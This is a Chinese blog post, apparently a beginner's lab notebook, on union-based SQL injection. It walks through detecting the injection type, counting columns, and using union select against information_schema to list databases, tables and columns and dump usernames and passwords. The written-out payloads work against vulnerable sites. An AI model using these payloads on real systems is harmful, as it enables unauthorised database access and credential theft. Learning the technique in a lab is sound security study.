Web_零基础入门sql注入_联合注入(DAY4)

最新推荐文章于 2024-09-10 14:15:00 发布
最新推荐文章于 2024-09-10 14:15:00 发布
阅读量157 收藏 1
点赞数 1
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHUNJIUJUN/article/details/119182520
版权

SQL注入简单解释:

SQL注入就是通过把SQL命令插入到Web表单递交、输入域名或页面请求的查询字符串,最终达到欺骗服务器并执行恶意的SQL命令

CMS注入简单演示

查库=》查表=》查列=》查字段=》获取信息 

拼接

 试出边界值为13

 除了一个一个试,我们常用二分法寻找边界值

?id=1 ?id=2 ?id=3能出不同的东西出来

因为直接查到了里面的相关内容 被回显出来了

sql注入的目的就是为了通过这个入口查询到数据库中其他的各种内容

 判断注入类型

先判断是不是数字型注入

and 1=1 或 and 1=2     and前后两个值都为真时执行

 都没有回显,说明不是数字型注入

 判断是否为字符型注入    (在and前加 ' )

 所以判断为字符型注入

接下来找回显位,先采用二分法确定列数,从1往后找

 

 确定了列数为4,然后定位可显示数据的列,即回显位

发现回显位为2和3

在回显位利用函数进行数据库操作

 ?id=1' and 1=2 union select 1,group_concat(schema_name),3 from information_schema.schemata%23                         #查询所有数据库名

?id=1' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23               

                                                                                  #查询security数据库中的所有表名

 ?id=1' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23     

                                                                                  #查询user表中所有字段

?id=1' and 1=2 union select 1,group_concat(password,'-',username),3 from users%23

步骤总结

1、?id=1  -->  ?id=2   -->  ?id=3

2、?id=1 and 1=1%23    -->    ?id=1 and 1=2%23   -->

      ?id=1 'and 1=1%23   -->    ?id=1 and 1=2%23   -->

      ?id=1 '     --> 修改闭合方式直到闭合成功

3、?id=1 and 1=1 order by 3%23   (by后边的值采用二分法试)

4、?id=1 and 1=1 union select 1,2,3%23  (1,2,3......取决于前一点试出来的值,并找出回显位)

5、?id=1 and 1=1 union select 1,函数, 函数%23  (假设回显位为2和3,则可以修改2和3)

SQL注入常用函数

version() :查询数据库版本

user() :查询数据库的使用者

datebase() :查询数据库名

information_schema.schemata :该数据表储存了数据库中所有数据库的库名

information_schema.tables :该数据表储存了数据库中所有数据表的表名

information_schema.columns :该数据表储存了数据库中所有列的列名

同样可以对某图书管理系统注入

同样先判断是否有注入点和注入点类型

可以使用以下口令获取管理员账户密码

联合查询步骤

常见闭合种类

'     闭合

') 闭合

"    闭合

")   闭合

单引号''、双引号""、括号()、括号+单引号('')、多层括号+单引号,例((((((((''))))))))。另外mysql还可以使用括号+双引号("")和多层括号+双引号((((((((""))))))))

tacooo
关注
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
2024年最新CTF Web SQL注入专项整理(持续更新中)_ctf sql注入,一文轻松搞定
2401_84300239的博客
05-06 857
在布尔盲注中,攻击者可能会使用一些常用的函数,如length()函数和ascii()函数。布尔注入是一种常见的SQL注入攻击技术,攻击者通过构造恶意输入,使应用程序的SQL查询返回不同的结果,从而达到绕过应用程序的安全机制,获取未授权的信息或执行恶意操作的目的。这种攻击方式主要利用Web页面的返回结果,根据页面返回的True或者是False来得到数据库中的相关信息。没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。
0day 新接口泛微e-cology getHendledWorkflowRequestList SQL注入漏洞
资深程序员,曾自学JAVA,C#,如今从业于网安行业
07-19 853
漏洞挖掘是指通过分析软件、系统或网络中存在的安全漏洞来发现并利用这些漏洞。漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统的安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-10 1708
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
2022网络安全超详细路线图,零基础入门看这篇就够了
欢迎来到技术宅的博客
02-28 1624
一.开始前的思考 1.我真的喜欢搞安全吗? 2.我只是想通过安全赚钱钱吗? 3.我不知道做什么就是随便。 4.一辈子做信息安全吗 这些不想清楚会对你以后的发展很不利,与其盲目的学习web安全,不如先做一个长远的计划。否则在我看来都是浪费时间。如果你考虑好了参照我的计划进行学习,我不敢保证你实践完多牛逼,但是找6k-9k的工作绝对不成问题。 1.目的 本问目的是带大家快速入门web安全,不会搞些虚张声势的东西都是我的学习经验. 不会涉及到特别详细的技术,而是指导你去如何系统的学习少走
Day66:WEB攻防-Java安全&SPEL表达式&SSTI模版注入&XXE&JDBC&MyBatis注入
2301_82257383的博客
04-26 389
MyBatis支持两种参数符号,一种是#,另一种是KaTeX parse error: Expected 'EOF', got '#' at position 4: ,**#̲使用预编译,使用拼接SQL。(造成注入原因也是因为使用了$进行拼接)**:由于使用#{}会将对象转成字符串,形成order by “user” desc造成错误,因此很多研发会采用${}来解决,从而造成注入这个SQL语句的目的是将0x7e以及当前用户的用户名插入到指定的XML字段中,从而执行恶意操作或泄露敏感信息。
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
杨秀璋的专栏
03-19 1万+
作为Web渗透的初学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
Web_信息搜集(DAY2)
CHUNJIUJUN的博客
07-27 3781
KALI whatweb功能 域名查询 爱站:dns.aizhan.com 站长之家 :tool.chinaz.com whois命令 子域名查询 http://tool.chinaz.com/subdomain 备案号查询 tianyancha.com 主机信息搜索 主机开放的端口和服务 主机的操作系统识别 常见端口 TCP端口(静态端口) TCP 0= Reserved TCP 1=TCP Port Service Multiplexer TCP 2..
phar / zip 伪协议的应用wp
CHUNJIUJUN的博客
08-13 1771
查看源码 显示只能上传txt文件 上传一个txt文件试试 上传成功 这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有 退回主页面查看主页面源码,发现有提示 lfi.txt 我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件被包含 ...
XSS过滤实操
CHUNJIUJUN的博客
08-10 1075
第一关——直接输出 第二关——value 第二关需要闭合value,看源码应该是用双引号闭合的,但是发现不行,于是用单引号闭合试了试竟然可以,可能是环境问题吧。。。 第三关——xss过滤简单 input没有闭合,而且alert没了被过滤了 成功 第四关——xss简单过滤 报错了,说明我们输入的某些语句触发了报错,一点一点删除语句尝试看看哪里错了 发现删除alert()函数不报错了,说明程序设置了使用alert报错,我们换...
Web——网络安全之通信安全_DDoS(DAY3)
CHUNJIUJUN的博客
07-19 769
网络通信域名 1、域名简介 2、URL 网络通信DDoS攻击 1、DDoS简介 2、DDos攻击原理 3、DDoS攻击形式 DDoS实战参考 使用Torshammer执行DDoS攻击 - 简书 (jianshu.com) https://www.jianshu.com/p/11bfbfaa7dfb?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_so...
PTE_本地文件包含wp
CHUNJIUJUN的博客
08-13 708
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了 开始答题,页面上没有什么有用信息 查看该页面的源码,也没找到什么有用信息 我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码 发现用Hello传了一次参数,第四行进行了base64加密 进行base64解密,发现是用POST方式以z0传参 综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He
反弹shell_DC-3_wp
CHUNJIUJUN的博客
08-20 690
反弹shell原理与实现 (转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com)) 什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我
PTE_远程文件包含wp
CHUNJIUJUN的博客
08-13 568
一堆看不懂的东西,发现并没有本地文件包含的点 试试远程文件包含,发现是可以的 从远程服务器远程文件包含一个写了一句话木马的 1.txt 发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀 成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦 显示 get it 查看源码,发现key值 ...
Web_docker_从vulhub拉取镜像并使用(DAY3)
CHUNJIUJUN的博客
07-28 546
首先下载好vulhub 下载成功后,cd到vulhub目录 cd vulhub ls 命令查看漏洞靶场 随便进入一个目录,任意选择镜像 这里以我随便选择的镜像为例 修改docker-conpose文件,把端口改成未使用的端口,例如8089:80 vim docker-compose.yml 启动环境 docker compose -d 查看启动环境,发现端口为之前我们改成的8089:80 docker-compose ps 查看kali的ip,主机浏览器访问 ...
PTE_文件上传wp
CHUNJIUJUN的博客
08-12 531
上传.php抓包发到repeater 改包 这是截图的时候打错了,应该是jpeg,还是失败,改大写 失败,改一句话 成功,去试一试 全选覆盖掉intercept 右键 然后把包放完 还是没成功,没有解析 重新之前所有步骤,尝试把phP改成php5然后继续Do intercept加放包发现可以解析了,但命令不执行,于是再试试把一句话的jm的单引号去掉,Do intercept,放包 输入命令,执行了,接下来cat key.php就行了 ...
存储型XSS_简单漏洞复现
CHUNJIUJUN的博客
08-10 417
首先随便注册一个账号登录 写一篇邮件,邮件内容插入xss语句 burpsuit抓包,发送到repeater,放包,发现script被过滤了 所以改包改用<img src=1 onpointerout=alert(123)> 这里我们去看看我们发布的内容是否双击以后有弹窗 弹窗出现,说明有xss漏洞 ...
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值